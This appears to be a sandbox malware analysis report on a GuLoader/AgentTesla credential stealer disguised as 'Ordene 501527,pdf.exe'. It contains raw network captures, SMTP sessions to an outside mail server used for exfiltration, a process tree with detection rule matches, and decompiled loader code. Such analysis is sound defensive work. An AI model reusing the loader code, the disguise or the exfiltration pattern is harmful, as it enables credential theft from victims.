f3 30 92 a4 9d e7 9d a7 16 02 54 5d 08 da 6e 45 01 ab aa a9 27 92 33 71 61 1b dd a5 bc 6f 6b 24 2c 47 a2 5b 0d 04 d4 5b c6 84 21 db 8e ee 0f 60 0c 95 68 d5 f0 fe 4f 60 51 d5 2f e9 c5 3f 18 eb 87 a5 37 40 3c fd 6f ab 2f db 88 78 f3 16 78 ce 1b a1 84 cc 1e 54 3f d1 1f 35 f2 f7 b4 dd 46 23 e9 36 6d ad d3 46 4a d1 fd e4 e4 ef ff d2 09 e1 c2 16 23 14 24 9c 7c 6e ad e4 8e 0d 19 be f8 3c 01 4e 60 17 87 f6 88 48 13 ad b0 f2 46 aa 55 e7 fa fe a7 bf d6 e0 dd ce 4a 1a 67 0a 37 08 6c 43 fc d7 42 10 8f 39 80 0b 9e ea aa c8 ba 2b 2a 9d 92 f4 2f c5 aa 30 86 f4 44 11 07 76 ab ae 4e 13 98 b6 3c 51 46 46 4c a0 a4 32 01 29 08 17 c2 98 7f 48 92 68 8e 66 8a 13 ce 5d d3 84 39 93 cc 40 f5 9e d1 af d9 ca a1 b7 b9 9e 0b bb 2b 51 0d b4 3f b6 84 a1 00 33 08 01 68 ca 8e 23 38 48 58 17 98 76 ad fd b5 8b 57 8a 64 8f 64 be 36 d7 b6 e4 75 c6 54 d7 51 56 d4 28 3d 72 5a e7 fc e6 09 ef ba 38 0b 27 52 cb c5 d0 a6 c4 9e 85 1f b1 b0 d7 cb 9f 71 79 ba 80 1c b9 1b 99 19 2f b6 0e 54 d6 f3 aa 1e 37 2f 07 02 17 2a a3 20 f7 54 b2 26 7e 96 ce 15 b9 a0 78 ab 87 90 1f 40 95 3e b4 95 fd 7c fa 46 fe cd b8 4c 75 12 5b 91 02 96 68 6a 29 a9 c3 c0 fb b3 4a 4d 35 91 5e 69 17 9e 62 d5 60 10 f5 98 4b bd 71 00 86 94 bd 9f 54 2b 6e fa b3 0a 0c dd 02 1e Data Ascii: ~[=dhwoKL_~2\HE{j)GCjQAB'3DNSFjL6)Fy{>An]x](b,nkF5xxcmD Q:%{)[yrTt L"y0o_TDL8Hj)\F^n`cbLT,v%5X.)!_2u1mNHb2xqbRBii3M1{;jeZm&a08u>W. wHsd8rbqw_x.,u-}+7in%b-y0Gy2J_7)@tm~R)_DL+=~F,''4+\"jDX2xv?SR!<W'B>+'/C>A<95}ysA"+v,a#V_/+4-psYfH9Ix_(\}\|0T]nE'3qaok$,G[[!`hO`Q/?7@<o/xxT?5F#6mFJ#$\|n<N`HFUJg7lCB9+/0DvN<QFFL2)Hhf]9@+Q?3h#8HXvWdd6uTQV(=rZ8'Rqy/T7/* T&~x@>\|FLu[hj)JM5^ib`KqT+n
Aug 8, 2022 13:30:13.487977028 CEST	9015	IN	Data Raw: bb fe 97 fa 29 ec 8a 35 d6 5f 38 5f 22 5d bb be 66 48 82 13 f2 06 e8 be e0 b7 81 7a e6 05 25 01 79 9b 04 09 da 71 1f 83 9c d2 7e 40 7e 19 81 6e ee 18 32 61 33 50 a7 10 89 9f 89 02 04 65 17 89 c1 3d f7 5a f4 6d 26 c5 68 30 a5 da 8a d3 ce 8c a6 3f Data Ascii: )5_8_"]fHz%yq~@~n2a3Pe=Zm&h0?Z(y7 [Cs9{hi^s(.V53i'l5-bG4vruR\|AS0\K=ptmZ'-ic(O3nkyk5'5etj
Aug 8, 2022 13:30:13.488024950 CEST	9017	IN	Data Raw: 01 c9 b3 64 4f 95 4f 47 67 aa 0c d6 56 d2 98 1f 6e cd bd f6 89 da bf de d2 4e c8 80 9c 20 bd 39 74 72 b0 3f c8 98 ce 0d 37 76 1f 42 d9 ba 37 10 56 58 17 92 65 96 4d a5 9d 5c 89 22 8d 63 af e0 f4 9a e6 67 e5 36 d2 47 ae fd 27 3f 65 5b cf c2 fe f7 Data Ascii: dOOGgVnN 9tr?7vB7VXeM\"cg6G'?e[ x{(=xyT.4)[Hy:o_CL#A8HoDj#WAv^`iQBG+g.A2")_2mNH;u6CkfbV
Aug 8, 2022 13:30:13.488070965 CEST	9018	IN	Data Raw: e7 91 0f 5c 00 54 5f 14 99 6e 45 01 03 8c ab 27 90 31 3a 61 08 e7 ac ae 42 43 4e 2e 46 a4 73 50 12 df 7a f5 f4 24 cc 76 c7 6d 62 14 94 40 a1 e4 00 48 64 78 c2 24 ef ea 53 e4 ea ad 8f 34 42 17 18 17 82 6e db 8c 1d d1 47 78 c4 3b 9a 9e ce 1e 7e 3d Data Ascii: \T_nE'1:aBCN.FsPz$vmb@Hdx$S4BnGx;~=<7MHv-CN.K()mD2]5OLjunWSf5@G@'JHgN{3hL>RoZjg%upW {=s.
Aug 8, 2022 13:30:13.507420063 CEST	9020	IN	Data Raw: 97 e8 51 4c 33 74 5a e5 86 58 61 80 40 05 90 d7 ba 74 94 de e3 5e b2 f1 56 24 27 69 b4 7e 7a 0d 53 8a e6 7c 83 cd f3 2b df d9 3d 10 89 a1 20 bd cf 01 84 00 af 6e fa 2c dd 21 9b d9 67 34 cb 6e 2f 8e c8 c2 b1 3a 98 4f c4 ea 42 85 ee 78 92 76 84 66 Data Ascii: QL3tZXa@t^V$'i~zS\|+= n,!g4n/:OBxvf?+S7>Wu@zy,?[>P167pA)?rf4w#P5'U#z5'3~q`H@?[Z>u\|GY{wvS,'Y>i$)[R ;#h
Aug 8, 2022 13:30:13.507479906 CEST	9021	IN	Data Raw: 46 1e 8a 57 78 6f e9 63 f9 68 20 af 98 4c a1 8c 6e f8 96 aa 9e 47 2b 67 03 c1 42 0e f6 0a 26 50 5d 18 fa 29 e4 b1 27 c7 59 1a 01 33 6d bf d1 c5 48 82 19 eb 00 ea 87 9e be aa 67 ce 49 32 ff 72 a4 0c 03 db 0f 03 95 62 d7 7a 0e 69 12 8b 41 86 e4 33 Data Ascii: FWxoch LnG+gB&P])'Y3mHgI2rbziA3K5;`-om,d!"u,]Pw`bxkz'wU/\|}D7cgJbG=u\|`CQAi&'}37#B'rm[dtR-{D)
Aug 8, 2022 13:30:13.507527113 CEST	9022	IN	Data Raw: c5 96 d1 a4 04 c7 8b c0 f3 e6 42 00 08 0f b6 a5 c0 ae dd d1 0c 53 4c 7b 58 cf 0e 36 01 23 34 af 17 a5 75 5c e0 46 70 67 a7 3d da 47 c7 f6 16 6d cd 6d 98 d4 da af d4 0e 4e b0 92 8a 27 37 b7 dd 07 b0 3f bc a8 6a 0f 33 0e 18 47 c8 bb 24 3b 68 5c 3f Data Ascii: BSL{X6#4u\Fpg=GmmN'7?j3G$;h\?3sj~EV;<$3}p=:{*).TG4Z!7_`ebF+Fl1YoDj#+FMcmbBu$^?fZ#.=_2
Aug 8, 2022 13:30:13.507575035 CEST	9024	IN	Data Raw: fd 4b 63 1d 48 78 7a b6 9c 13 73 83 75 f7 9f de d6 9e 34 70 5c 7d ae 93 1c 85 f3 3e f2 a5 8f ee bf 96 15 02 5e 71 7f d3 6e 43 64 84 ae a9 2d f9 a9 71 61 02 fe ad ae 49 43 96 2c 46 a8 73 af 12 df 7a c4 97 32 cc 61 fb 38 9c 15 b2 63 c5 95 b4 4e 4c Data Ascii: KcHxzsu4p\}>^qnCd-qaIC,Fsz2a8cNLY 32+9nx.;>6`2Ju:5 O(fxQ(HF_LGPFx -"@(7QBRuB^.kdH`t
Aug 8, 2022 13:30:13.507652998 CEST	9025	IN	Data Raw: b5 21 14 2d 0a 6c e4 06 6b 83 db 2c a6 61 55 27 73 f9 ff 65 c3 75 95 7b 69 f6 33 b8 50 44 ec 94 96 2b 0b 32 7e 33 3d 80 37 23 8a 59 1c 9e a9 b8 71 82 24 f4 41 a0 fa 42 09 6e 78 b1 6b 59 d7 52 a6 e2 6f 82 f4 fa d4 5e 35 34 7f ee b6 13 98 88 ad 86 Data Ascii: !-lk,aU'seu{i3PD+2~3=7#Yq$ABnxkYRo^54l.0m6st>phl2xK;@!3?WuQqN%/C>A#3c/'{}yuI"!e5)pV$E<>'1sw]j?Cm_\|4!&G]{jR
Aug 8, 2022 13:30:13.507714987 CEST	9027	IN	Data Raw: 87 97 0d 96 77 12 b6 b4 f5 89 09 61 fe f3 b8 4c 75 35 5e ab 28 b8 44 6a 23 77 c4 c6 d1 a2 5c 46 5f 96 5e 6e 00 60 63 f9 62 08 fe 98 bf aa 8f 01 59 97 aa 94 44 2c 76 04 af 26 0e f7 1b 05 5d 2e c9 fb 29 ee 8a 21 d6 4e 1a a6 33 6d bf b4 4c 33 a8 13 Data Ascii: waLu5^(Dj#w\F_^n`cbYD,v&].)!N3mL3LIx9qD)hiA"3KX;`o0Zf$Z0,u!>]A2RHsL\|uH}x+-U+=1Rd-bOO\d_Wz8PNuy4gXX
Aug 8, 2022 13:30:13.507770061 CEST	9028	IN	Data Raw: 77 d6 e2 b6 b0 d1 6c fe f4 51 1a 6a cd c5 09 40 5a cc c8 42 17 93 ef 21 27 9c f7 d5 c4 bd 33 cf 8f b7 e9 64 cd 90 da 76 40 53 c7 8e 36 a7 ae 4f 0a b5 b4 05 42 41 7c 23 52 a4 36 0b 38 1e 10 c0 3d d3 4e 21 e3 6c eb f7 11 d6 57 df 9c 3f 6b d2 63 a8 Data Ascii: wlQj@ZB!'3dv@S6OBA\|#R68=N!lW?kc_V^rEBfXy^Vc\|g~=64t>xJr4$M>Z'=V]0Qw0:TQMl7YI8w\F(Oaqnw

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Aug 8, 2022 13:30:24.723265886 CEST	587	49796	69.61.116.42	192.168.11.20	220-linux58.webhosting-network-services.com ESMTP Exim 4.95 #2 Mon, 08 Aug 2022 07:30:24 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Aug 8, 2022 13:30:24.723635912 CEST	49796	587	192.168.11.20	69.61.116.42	EHLO 141700
Aug 8, 2022 13:30:24.847345114 CEST	587	49796	69.61.116.42	192.168.11.20	250-linux58.webhosting-network-services.com Hello 141700 [84.17.52.5] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-STARTTLS 250 HELP
Aug 8, 2022 13:30:24.847774029 CEST	49796	587	192.168.11.20	69.61.116.42	STARTTLS
Aug 8, 2022 13:30:24.973896980 CEST	587	49796	69.61.116.42	192.168.11.20	220 TLS go ahead
Aug 8, 2022 13:30:34.274610043 CEST	587	49797	69.61.116.42	192.168.11.20	220-linux58.webhosting-network-services.com ESMTP Exim 4.95 #2 Mon, 08 Aug 2022 07:30:33 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Aug 8, 2022 13:30:34.275027037 CEST	49797	587	192.168.11.20	69.61.116.42	EHLO 141700
Aug 8, 2022 13:30:34.385174990 CEST	587	49797	69.61.116.42	192.168.11.20	250-linux58.webhosting-network-services.com Hello 141700 [84.17.52.5] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-STARTTLS 250 HELP
Aug 8, 2022 13:30:34.385531902 CEST	49797	587	192.168.11.20	69.61.116.42	STARTTLS
Aug 8, 2022 13:30:34.496872902 CEST	587	49797	69.61.116.42	192.168.11.20	220 TLS go ahead

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Ordene 501527,pdf.exePID: 4496, Parent PID: 2940

General

Target ID:	1
Start time:	13:29:22
Start date:	08/08/2022
Path:	C:\Users\user\Desktop\Ordene 501527,pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ordene 501527,pdf.exe"
Imagebase:	0x400000
File size:	596608 bytes
MD5 hash:	5162B6782F86F1F24E8610544D159AE9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.39990186767.00000000037B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 4944, Parent PID: 4496

General

Target ID:	8
Start time:	13:30:00
Start date:	08/08/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Ordene 501527,pdf.exe"
Imagebase:	0x40000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 4428, Parent PID: 4496

General

Target ID:	9
Start time:	13:30:01
Start date:	08/08/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ordene 501527,pdf.exe"
Imagebase:	0xeb0000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000000.39838910204.0000000001300000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4596, Parent PID: 4428

General

Target ID:	10
Start time:	13:30:01
Start date:	08/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7d9660000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: flex.exePID: 7436, Parent PID: 5008

General

Target ID:	14
Start time:	13:30:27
Start date:	08/08/2022
Path:	C:\Users\user\AppData\Roaming\flex\flex.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\flex\flex.exe"
Imagebase:	0x2f0000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7356, Parent PID: 7436

General

Target ID:	15
Start time:	13:30:27
Start date:	08/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7d9660000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: flex.exePID: 5196, Parent PID: 5008

General

Target ID:	16
Start time:	13:30:35
Start date:	08/08/2022
Path:	C:\Users\user\AppData\Roaming\flex\flex.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\flex\flex.exe"
Imagebase:	0x2c0000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 8164, Parent PID: 5196

General

Target ID:	17
Start time:	13:30:35
Start date:	08/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7d9660000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Ordene 501527,pdf.exePID: 4496, Parent PID: 2940COMMON

Execution Graph

Execution Coverage:	35.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.9%
Total number of Nodes:	488
Total number of Limit Nodes:	10

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00403350 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				WCHAR* _t60;
				char* _t63;
				void* _t66;
				void* _t68;
				int _t70;
				int _t72;
				int _t75;
				intOrPtr* _t76;
				int _t77;
				signed int _t79;
				void* _t103;
				signed int _t120;
				void* _t123;
				void* _t128;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr* _t149;
				int _t151;
				void* _t154;
				signed int _t155;
				signed int _t163;
				signed int _t168;
				void* _t170;
				WCHAR* _t171;
				signed int _t174;
				signed int _t177;
				CHAR* _t178;
				void* _t181;
				int* _t183;
				void* _t191;
				char* _t192;
				void* _t195;
				void* _t196;
				void* _t242;

				_t170 = 0x20;
				_t151 = 0;
				 *(_t196 + 0x14) = 0;
				 *(_t196 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t196 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x7a8a2c = _t51;
				if(_t51 != 6) {
					_t149 = E00406639(0);
					if(_t149 != 0) {
						 *_t149(0xc00);
					}
				}
				_t178 = "UXTHEME";
				goto L4;
				L8:
				__imp__#17(_t191);
				__imp__OleInitialize(_t151); // executed
				 *0x7a8af8 = _t56;
				SHGetFileInfoW(0x79fee0, _t151, _t196 + 0x34, 0x2b4, _t151); // executed
				E0040625F(0x7a7a20, L"NSIS Error");
				_t60 = GetCommandLineW();
				_t192 = L"\"C:\\Users\\Arthur\\Desktop\\Ordene 501527,pdf.exe\" ";
				E0040625F(_t192, _t60);
				 *0x7a8a20 = GetModuleHandleW(_t151);
				_t63 = _t192;
				if(L"\"C:\\Users\\Arthur\\Desktop\\Ordene 501527,pdf.exe\" " == 0x22) {
					_t63 =  &M007B3002;
					_t170 = 0x22;
				}
				_t155 = CharNextW(E00405B5D(_t63, _t170));
				 *(_t196 + 0x18) = _t155;
				_t66 =  *_t155;
				if(_t66 == _t151) {
					L33:
					_t171 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t171);
					_t68 = E0040331F(_t155, 0);
					_t224 = _t68;
					if(_t68 != 0) {
						L36:
						DeleteFileW(L"1033"); // executed
						_t70 = E00402EC1(_t226,  *(_t196 + 0x1c)); // executed
						 *(_t196 + 0x10) = _t70;
						if(_t70 != _t151) {
							L48:
							E00403893();
							__imp__OleUninitialize();
							_t238 =  *(_t196 + 0x10) - _t151;
							if( *(_t196 + 0x10) == _t151) {
								__eflags =  *0x7a8ad4 - _t151;
								if( *0x7a8ad4 == _t151) {
									L72:
									_t72 =  *0x7a8aec;
									__eflags = _t72 - 0xffffffff;
									if(_t72 != 0xffffffff) {
										 *(_t196 + 0x10) = _t72;
									}
									ExitProcess( *(_t196 + 0x10));
								}
								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t196 + 0x14);
								__eflags = _t75;
								if(_t75 != 0) {
									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t196 + 0x20);
									 *(_t196 + 0x34) = 1;
									 *(_t196 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t196 + 0x28), _t151, _t196 + 0x24, _t151, _t151, _t151);
								}
								_t76 = E00406639(4);
								__eflags = _t76 - _t151;
								if(_t76 == _t151) {
									L70:
									_t77 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L72;
									}
									goto L71;
								} else {
									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
									__eflags = _t79;
									if(_t79 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E004058C1( *(_t196 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x7a8a40 == _t151) {
							L47:
							 *0x7a8aec =  *0x7a8aec | 0xffffffff;
							 *(_t196 + 0x14) = E0040396D(_t155,  *0x7a8aec);
							goto L48;
						}
						_t183 = E00405B5D(_t192, _t151);
						if(_t183 < _t192) {
							L44:
							_t235 = _t183 - _t192;
							 *(_t196 + 0x10) = L"Error launching installer";
							if(_t183 < _t192) {
								_t181 = E0040582C(_t238);
								lstrcatW(_t171, L"~nsu");
								if(_t181 != _t151) {
									lstrcatW(_t171, "A");
								}
								lstrcatW(_t171, L".tmp");
								_t194 = L"C:\\Users\\Arthur\\Desktop";
								if(lstrcmpiW(_t171, L"C:\\Users\\Arthur\\Desktop") != 0) {
									_push(_t171);
									if(_t181 == _t151) {
										E0040580F();
									} else {
										E00405792();
									}
									SetCurrentDirectoryW(_t171);
									_t242 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Misundes\\Caesural4" - _t151; // 0x43
									if(_t242 == 0) {
										E0040625F(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Misundes\\Caesural4", _t194);
									}
									E0040625F(0x7a9000,  *(_t196 + 0x18));
									_t156 = "A" & 0x0000ffff;
									 *0x7a9800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t195 = 0x1a;
									do {
										E00406281(_t151, _t171, 0x79f6e0, 0x79f6e0,  *((intOrPtr*)( *0x7a8a34 + 0x120)));
										DeleteFileW(0x79f6e0);
										if( *(_t196 + 0x10) != _t151 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\Ordene 501527,pdf.exe", 0x79f6e0, 1) != 0) {
											E00406025(_t156, 0x79f6e0, _t151);
											E00406281(_t151, _t171, 0x79f6e0, 0x79f6e0,  *((intOrPtr*)( *0x7a8a34 + 0x124)));
											_t103 = E00405844(0x79f6e0);
											if(_t103 != _t151) {
												CloseHandle(_t103);
												 *(_t196 + 0x10) = _t151;
											}
										}
										 *0x7a9800 =  *0x7a9800 + 1;
										_t195 = _t195 - 1;
									} while (_t195 != 0);
									E00406025(_t156, _t171, _t151);
								}
								goto L48;
							}
							 *_t183 = _t151;
							_t184 =  &(_t183[2]);
							if(E00405C38(_t235,  &(_t183[2])) == 0) {
								goto L48;
							}
							E0040625F(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Misundes\\Caesural4", _t184);
							E0040625F(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Misundes\\Caesural4\\Kvalitative209", _t184);
							 *(_t196 + 0x10) = _t151;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t155 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t120 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t163 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
						while( *_t183 != _t155 || _t183[1] != _t120) {
							_t183 = _t183;
							if(_t183 >= _t192) {
								continue;
							}
							break;
						}
						_t151 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(_t171, 0x3fb);
					lstrcatW(_t171, L"\\Temp");
					_t123 = E0040331F(_t155, _t224);
					_t225 = _t123;
					if(_t123 != 0) {
						goto L36;
					}
					GetTempPathW(0x3fc, _t171);
					lstrcatW(_t171, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t171);
					SetEnvironmentVariableW(L"TMP", _t171);
					_t128 = E0040331F(_t155, _t225);
					_t226 = _t128;
					if(_t128 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t154 = 0x20;
						if(_t66 != _t154) {
							L13:
							if( *_t155 == 0x22) {
								_t155 = _t155 + 2;
								_t154 = 0x22;
							}
							if( *_t155 != 0x2f) {
								goto L27;
							} else {
								_t155 = _t155 + 2;
								if( *_t155 == 0x53) {
									_t148 =  *((intOrPtr*)(_t155 + 2));
									if(_t148 == 0x20 || _t148 == 0) {
										 *0x7a8ae0 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t168 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t174 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t168;
								if( *_t155 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t168) &&  *((intOrPtr*)(_t155 + 4)) == _t174) {
									_t147 =  *((intOrPtr*)(_t155 + 8));
									if(_t147 == 0x20 || _t147 == 0) {
										 *(_t196 + 0x1c) =  *(_t196 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t163 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t177 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t163;
								if( *(_t155 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t163) ||  *_t155 != _t177) {
									goto L27;
								} else {
									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
									__eflags = _t155;
									E0040625F(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Misundes\\Caesural4", _t155);
									L32:
									_t151 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t155 = _t155 + 2;
						} while ( *_t155 == _t154);
						goto L13;
						L27:
						_t155 = E00405B5D(_t155, _t154);
						if( *_t155 == 0x22) {
							_t155 = _t155 + 2;
						}
						_t66 =  *_t155;
					} while (_t66 != 0);
					goto L32;
				}
				L4:
				E004065C9(_t178); // executed
				_t178 =  &(_t178[lstrlenA(_t178) + 1]);
				if( *_t178 != 0) {
					goto L4;
				} else {
					E00406639(0xa);
					 *0x7a8a24 = E00406639(8);
					_t56 = E00406639(6);
					if(_t56 != _t151) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x7a8a2f =  *0x7a8a2f | 0x00000040;
						}
					}
					goto L8;
				}
			}

0x0040335b
0x0040335c
0x00403363
0x00403367
0x0040336f
0x00403373
0x0040337f
0x00403388
0x0040338d
0x00403390
0x00403397
0x0040339e
0x0040339e
0x00403397
0x004033a0
0x004033a0
0x004033e8
0x004033e9
0x004033f0
0x004033f6
0x0040340c
0x0040341c
0x00403421
0x00403427
0x0040342e
0x00403442
0x00403447
0x00403449
0x0040344d
0x00403452
0x00403452
0x00403461
0x00403463
0x00403467
0x0040346d
0x00403584
0x0040358a
0x00403595
0x00403597
0x0040359c
0x0040359e
0x004035f6
0x004035fb
0x00403605
0x0040360c
0x00403610
0x004036c1
0x004036c1
0x004036c6
0x004036cc
0x004036d1
0x004037f7
0x004037fd
0x0040387b
0x0040387b
0x00403880
0x00403883
0x00403885
0x00403885
0x0040388d
0x0040388d
0x0040380d
0x00403813
0x00403815
0x00403822
0x00403835
0x0040383d
0x00403845
0x00403845
0x0040384d
0x00403852
0x00403859
0x00403867
0x0040386a
0x00403870
0x00403872
0x00000000
0x00000000
0x00000000
0x0040385b
0x00403861
0x00403863
0x00403865
0x00403874
0x00403876
0x00000000
0x00403876
0x00000000
0x00403865
0x00403859
0x004036e0
0x004036e7
0x004036e7
0x0040361c
0x004036b1
0x004036b1
0x004036bd
0x00000000
0x004036bd
0x00403629
0x0040362d
0x0040367b
0x0040367b
0x0040367d
0x00403685
0x004036f8
0x004036fa
0x00403701
0x00403709
0x00403709
0x00403714
0x00403719
0x00403728
0x0040372c
0x0040372d
0x00403736
0x0040372f
0x0040372f
0x0040372f
0x0040373c
0x00403742
0x00403749
0x00403751
0x00403751
0x0040375f
0x0040376b
0x00403779
0x0040377e
0x00403784
0x00403790
0x00403796
0x004037a0
0x004037b6
0x004037c7
0x004037cd
0x004037d4
0x004037d7
0x004037dd
0x004037dd
0x004037d4
0x004037e1
0x004037e8
0x004037e8
0x004037ed
0x004037ed
0x00000000
0x00403728
0x00403687
0x0040368a
0x00403695
0x00000000
0x00000000
0x0040369d
0x004036a8
0x004036ad
0x00000000
0x004036ad
0x00403636
0x0040364e
0x0040365f
0x00403660
0x00403664
0x00403666
0x00403674
0x00403677
0x00000000
0x00000000
0x00000000
0x00403677
0x00403679
0x00000000
0x00403679
0x004035a6
0x004035b2
0x004035b7
0x004035bc
0x004035be
0x00000000
0x00000000
0x004035c6
0x004035ce
0x004035df
0x004035e7
0x004035e9
0x004035ee
0x004035f0
0x00000000
0x00000000
0x00000000
0x00403473
0x00403473
0x00403475
0x00403479
0x00403482
0x00403486
0x0040348b
0x0040348c
0x0040348c
0x00403491
0x00000000
0x00403497
0x00403498
0x0040349d
0x0040349f
0x004034a7
0x004034ae
0x004034ae
0x004034a7
0x004034bf
0x004034d2
0x004034d3
0x004034e8
0x004034ed
0x004034f1
0x004034fa
0x00403502
0x00403509
0x00403509
0x00403502
0x00403515
0x00403528
0x00403529
0x0040353e
0x00403544
0x00403548
0x00000000
0x0040356f
0x0040356f
0x00403574
0x0040357d
0x00403582
0x00403582
0x00000000
0x00403582
0x00403548
0x00000000
0x00000000
0x00000000
0x0040347b
0x0040347b
0x0040347c
